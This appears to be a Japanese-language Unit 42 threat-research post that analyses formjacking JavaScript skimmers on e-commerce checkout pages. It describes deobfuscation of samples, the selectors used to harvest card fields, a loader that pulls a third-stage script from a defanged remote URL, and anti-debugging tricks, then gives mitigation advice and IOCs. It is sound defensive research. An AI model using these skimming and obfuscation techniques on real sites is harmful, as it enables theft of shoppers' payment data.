詳説 フォームジャッキング攻撃 処理の流れとテクニック

By , , and

Category: Unit 42

Tags: ,

This post is also available in: English (英語)

概要

インターネットの台頭は多くの点で人々の生活にプラスに働いてきました。いまでは、インターネット上でほぼどんなサービスでも見つけることができます。ですが同時にインターネットの利便性はマルウェアで個人の機微情報を盗むための扉も開いてしまいます。残念ながらマルウェア作成者によるこうした機会の悪用は増える一方です。

サイバー犯罪者が悪意のあるJavaScriptコードを挿入してWebサイトをハッキングし、サイトのフォームページ機能を乗っ取って機微なユーザー情報を収集する「フォームジャッキング」攻撃は、最も急速に成長しているサイバー攻撃の1つです。こうしたスクリプトはECサイトの「チェックアウト(会計)」ページでキャプチャした支払いフォームからクレジットカードの詳細その他の個人情報を盗むように設計されています。

ハッキングによって侵害されたECサイトにユーザーが知らずにアクセスした場合、チェックアウトページで商品をカートに入れてチェックアウトし、クレジットカード情報(名前、住所、電子メール、クレジットカード番号、CVV、有効期限など)を入力することになります。そしてユーザーが「チェックアウト」や「送信」ボタンをクリックすると、悪意のあるコードがユーザーの入力情報を収集し、攻撃者のコマンド&コントロール(C2)サーバーに送信します。元の発注じたいは影響を受けないのでユーザーは予期したとおりに製品を受け取れてしまいます。多くの大手ECサイトがこの手法で侵害されており、その中にはBritish Airways、Ticketmaster、Delta、Newegg、Topps.com Sports Collectiblesなども含まれます。

フォームジャッキング攻撃の処理の流れがどのようなものかを図1に示します。

フォームジャッキングの処理の流れ
図 1. フォームジャッキングの処理の流れ

フォームジャッキング用コードを記述してそれを侵害されたサイトに配備することは、攻撃者にとってはそれほど難しことではありません。これならマルウェアの配備やシステム侵害の手間がかからず、クレジットカード情報をすばやく簡単に盗むことができます。

とくに昨今ECサイトサービスは非常に人気が高いことからこの手法は攻撃者にとっては非常に魅力的です。

そこで本稿では、フォームジャッキングのコードのしくみについて詳しく説明していきます。なお、パロアルトネットワークス製品をお使いのお客様はフォームジャッキング攻撃から保護されています。WildFireはフォームジャッキング攻撃を悪意のあるものとして検出して正しく識別し、PANDBはURLを悪意のあるものとして識別します。

典型的なフォームジャッキング攻撃

以下は典型的なフォームジャッキング攻撃からのサンプルです。2020年4月8日時点では、VirusTotal上で3つのアンチウイルスサービスのみがこのコードを「悪意がある」ものとして検出していました。(SHA256:a79da1f007cfc88e4f8ae13623e2b752d2da03bcf9d51a74ea1fca2e6e6fca14)

このコードは非常に長ったらしく、また高度に難読化されています。内容を読み取るには先に難読化を解除する必要があります。以下はその元となったコードの一部です。

まず目に入ったのが次の基本構造でした。

var1を例にとり、これを3つの部分に分解します。

  • [“W*![EnTa/mKelU*R=R'3/ngu8mpe/rqxo7N_EcglaDrvtla5qoK‘!]” は文字列の1つめの部分です。これは暗号化されています。
  • [(785034646 * “kNL7xIvgS.\x85j}_K=” [“charCodeAt”](2) + 22.0)[“toString”]((“Y^8ZH/D:0$or5<+\x8aqU” [“charCodeAt”](3) * 0 +36.0))] は2つめの部分です。
    1. (785034646 * “kNL7xIvgS.\x85j}_K=” [“charCodeAt”](2) + 22.0) を計算して 59662633118を得ます。
    2. (“Y^8ZH/D:0$or5<+\x8aqU” [“charCodeAt”](3) * 0 +36.0)) も計算して36を得ます。
    3. つまり2つめの部分は(59662633118).toString(36)に等しくなります。この結果は「replace」という文字列になります(toString関数についてはこちらの文書を参照)。
  • (/[\!8ET\/WNl5vRDpgUqKx37]/g, "") が3つめの部分になりますが、これは正規表現のパターンです。

結果的にvar1は"xxxxx".replace(/[\!8ET\/WNl5vRDpgUqKx37]/g, “”) と等しくなるので、ここでは正規表現を使って文字列を復号していることになります。復号されたvar1は“*[name*=’numero_cartao’]”になります。

最終的にこのコードの難読化を解除すると、次の結果が得られます。

次のコードは元のコードからの別の部分です。

このコードも難読化を解除すると次の内容になります。

こうして元のコードの核心部分の難読化を解除した結果が次のコードです。

これでようやくイベントの主な流れがわかるようになりました。

  1. リスナーを “DOMContentLoaded” 上に作成し、イベントを”load“し、ページのロードが終わったらsHv関数を実行します。このsHv関数はタイマーを作成してyFj関数を7秒ごとに実行します。
  2. yFj関数はページ内のすべての支払関連ボタンをスキャンします。このさいに利用されるのが“button[onclick*=’.save’]”“button[class*=’checkout’]”です。これが存在していれば”click“リスナー、”mousedown“リスナーがイベント関数zTIを指定して生成されます。
  3. ユーザーが関連するボタンをクリックするとzTI関数がトリガーされ、zTI関数はdocument.querySelector (pa4関数参照)を使って下のHTML要素のどんな値であれ収集します。これらの値にはクレジットカードの情報が含まれています。
    • window[“payment_checkout1”] = [“*[name*=’numero_cartao’]”, “input[id*=’cc_number’]”, “*[name*=’cc_num’]”]
    • window[“payment_checkout2”] = [“*[name*=’expiracao_mes’]”, “*[name*=’cc_exp_m’]”, “*[name*=’expirationMonth’]”]
    • window[“payment_checkout3”] = [“*[name*=’expiracao_ano’]”, “*[name*=’cc_exp_y’]”, “*[name*=’expirationYear’]”]
    • window[“payment_checkout4”] = [“*[name*=’codigo_seguranca’]”, “input[id*=’cc_cid’]”, “*[name*=’cc_cid’]”]
  • その後hZy関数とF8S関数が呼び出され、収集したデータを暗号化します。
  • 最後にwIW関数が呼び出されて暗号化したデータをリモートサーバーに送信します。

主な処理の流れを次の図2に示します。

フォームジャッキングの処理の流れ
図 2. フォームジャッキングの処理の流れ

ようするに「クリック」イベントをリッスンし、クリックイベントが発生すればフォームに入力したすべての支払い情報を収集してC2サーバーに送信する、ということです。

高度な例

これが高度なフォームジャッキング攻撃だと、自身をより巧妙に隠しているため、追跡が非常に難しくなります。この分析では以下のSHA256値をもつサンプルを使用します。

(SHA256: 5775efac071288ff6632056635f285b03bf2ab6d6dee1fd902555e256fe63119)

一見するとこちらのコードはほんの数行だけとシンプルです。

上記の4段階は次のようになっています。

  1. PFGという変数を生成する。これは文字列のコンストラクタ関数です。
  2. ループを使って第2段階のコードを復号し、復号したコードをqKn 変数に割り当てます。
  3. hAn.toString関数をPFG.constructor(qKn).constructorでオーバーライドします。
  4. hAn.toString()関数を実行するとxxx.constructor(qKn).constructor()が実行され、これがqKnをコードとして実行します。2ステップ目でqKnには第2段階のコードが割り当てられています。

次に第2段階のコードを分析していきます。このコードのハッシュ値は次のとおりです。

(SHA256:1e4300dff5e0978092102028487c08267b74fb3beef14faa56b0f1a3fbc53ae4)

先に説明したとおり、ここでは「正規表現」がコードの難読化に利用されています。復号すると、これが単なるダウンローダで、以下の内容しか行っていないことがわかります。

  1. DOM要素 cdn=document.createElement(“script”)を生成する
  2. 要素のソースURLをcdn.src=”hxxps://xxxxxx[.]com/js/content.js”;に設定する
  3. この要素をDOMツリーにアペンドする

つまりこのコードは第3段階のコードをhxxps://myxintad[.]com/js/content.jsからダウンロードするわけですが、このURLにはすでにアクセスができなくなっています。このため内容は取得できていませんが、以前行った分析の結果からは、強力なJavaScriptを使えば攻撃者にはじつに様々なことが行えます。たとえば次のようなことが行えるのです。

    • コードの難読化と暗号化
    • 標的のWebサイトにはダウンローダだけを配置しておき、実際の悪意のあるコードは自身のリモートサーバー上に配置する。こうしておけば、攻撃者はコンテンツをたやすく変更でき、アクセス可能にする期間も決めることができる
    • 多段階のマルウェアを作成して追跡がより困難となるようにする。ここでも第1段階から第3段階まであって、リサーチャーにとっては大きなストレスのもとに

さらに高度なテクニック

マルウェア作成者は場合によってはさらに高度なテクニックを使い、コードをデバッグしにくくします。次の分析では以下のSHA256値をもつサンプルを使用します。上記で分析したものとよく似ていますが、以下には難読化された追加のアンチデバッグコードが含まれています。

(SHA256:981d0c4d7e1d9249f3c0f59021f02c171233a5259ebda20a671e13d474fb74ec)

この難読化を解除したコードは次のとおりです。

このコードは次の2つのテクニックを使い、分析がされにくいようにしてあります。

  1. 分析者がFirebugデバッガを使ってコードをデバッグしているかどうかをチェックする
  2. JavaScriptの条件演算子を使い、検出結果によって別の条件節を実行させる。場合によってはわざわざjavascriptの条件演算子をカスケードさせたりもする(例: “condition1 ?aaa: (condition2?bbb: (condition3?ccc: ddd)))“)。こうなるとデバッグのブレークポイント設定がひたすら面倒になります。

結論

JavaScriptはけっして新しいテクノロジというわけではありません。これまで20年以上使われてきていますし絶えずアップデートもされています。今日ほとんどのWebサイトにはJavascriptが使用されているので、フォームジャッキングのようなJavaScriptを使った攻撃はトレンドになりつつと私たちは見ています。

フォームジャッキング攻撃によるリスクを緩和するため、オンラインで小売業やECサイトを営む皆さんは、自社のシステムやコンポーネント、Webプラグインのすべてにパッチを適用し、侵害を受けないようにしておくことが推奨されます。あわせて、定期的にWebコンテンツの整合性チェックをオフラインで実行することで、攻撃者にページが編集されていないか、悪意のあるJSコードが挿入されていないかを確認するのがベストプラクティスといえるでしょう。最後にコンテンツ管理システム(CMS)の管理者は、強力なパスワードでブルートフォース攻撃を受けにくくしておくべきでしょう。

ご自身がECサイトで買い物をする消費者である場合は、PayPalやVISA Securedなど、よく利用されているワンタイムの支払いオプションを使って支払いをすることをお勧めします。できるかぎり、ご自身のクレジットカードを利用するのは控えましょう。また最近のオンライン取引が原因でクレジットカード情報が盗まれたと信じる理由がある場合は、すぐに銀行に連絡してカードの利用停止・再発行をしてもらうべきでしょう。くわえて、盗まれた個人情報で新しいアカウントを開設できないよう、クレジット凍結も検討すべきでしょう。

パロアルトネットワークス製品をお使いのお客様はフォームジャッキング攻撃から保護されています。WildFireはフォームジャッキング攻撃を悪意のあるものとして検出して正しく識別し、PANDBはURLを悪意のあるものとして識別します。

謝辞

Kyle Wilhoit氏、Jen Miller Osborn氏、ならびにMark Karayan氏には本稿に助言をいただき、また内容改善にご協力いただきました。ここに厚くお礼申し上げます。ありがとうございました。

IOC

hxxps://www.cheshirehorse[.]com/

a79da1f007cfc88e4f8ae13623e2b752d2da03bcf9d51a74ea1fca2e6e6fca14

hxxp://92wear[.]vn/

5775efac071288ff6632056635f285b03bf2ab6d6dee1fd902555e256fe63119

1e4300dff5e0978092102028487c08267b74fb3beef14faa56b0f1a3fbc53ae4

hxxps://www.posterburner[.]com/SavedSession.aspx?SID=3Daba5c976c3f441ecbf449=

981d0c4d7e1d9249f3c0f59021f02c171233a5259ebda20a671e13d474fb74ec